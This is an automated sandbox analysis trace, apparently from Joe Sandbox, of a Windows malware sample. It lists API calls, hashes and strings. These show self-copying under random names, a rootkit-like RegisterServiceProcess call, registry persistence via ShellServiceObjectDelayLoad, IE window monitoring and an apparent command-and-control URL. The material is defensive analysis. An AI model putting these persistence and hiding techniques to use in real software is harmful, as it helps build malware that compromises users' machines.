                             Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            APIs
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage: 5.4%
                            Dynamic/Decrypted Code Coverage: 0%
                            Signature Coverage: 0%
                            Total number of Nodes: 542
                            Total number of Limit Nodes: 2
401386 2703->2705 2704->2705 2705->2695

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            • Basic blocks: 60 403619-40364c (CreateFileA); 61 403664-403682 (GetFileSize, LocalAlloc); 62 40364e-403652; 63 403684-40368a; 64 40368c-40368f; 65 403654-403657; 66 40365a-40365c; 67 403692-4036ab (ReadFile, CloseHandle); 68 4036ae-4036b2
                            • Edges: 60->61, 60->62, 61->63, 61->64, 62->65, 62->66, 63->67, 64->67, 65->66, 66->61, 66->68, 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Onkcje32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Onkcje32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Onkcje32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Onkcje32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Onkcje32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-3154792301
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph

                            • Basic blocks: 69 404148-404190 (RegCreateKeyExA); 70 404193-404198; 71 40419a-4041c2 (RegSetValueExA, RegCloseKey)
                            • Edges: 69->70, 70->70, 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph

                            • Basic blocks: 72 40365e-403682 (GetFileSize, LocalAlloc); 74 403684-40368a; 75 40368c-40368f; 76 403692-4036b2 (ReadFile, CloseHandle)
                            • Edges: 72->74, 72->75, 74->76, 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph

                            • Basic blocks: 78 407980-40798f (GetCommandLineA); 79 407991-4079a4 (strchr); 80 4079b4-4079b9; 81 4079a6-4079a9; 82 4079cf-4079dc (GetModuleHandleA, call 406c29); 83 4079c0; 84 4079bb-4079be; 85 4079ac-4079af; 86 4079b3; 87 4079c3-4079c8; 89 4079e1-4079e3; 90 4079b1; 91 4079ab; 92 4079ca-4079cd; 93 4079c2
                            • Edges: 78->79, 78->80, 79->81, 79->82, 80->83, 80->84, 81->85, 82->89, 83->87, 84->83, 84->86, 85->90, 85->91, 86->80, 87->82, 87->92, 90->82, 91->85, 92->82, 92->93, 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph

                            • Basic blocks: 94 401219; 95 40121f-40127f (__GetMainArgs, call 407980); 97 401284-401293 (exit)
                            • Edges: 94->95, 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
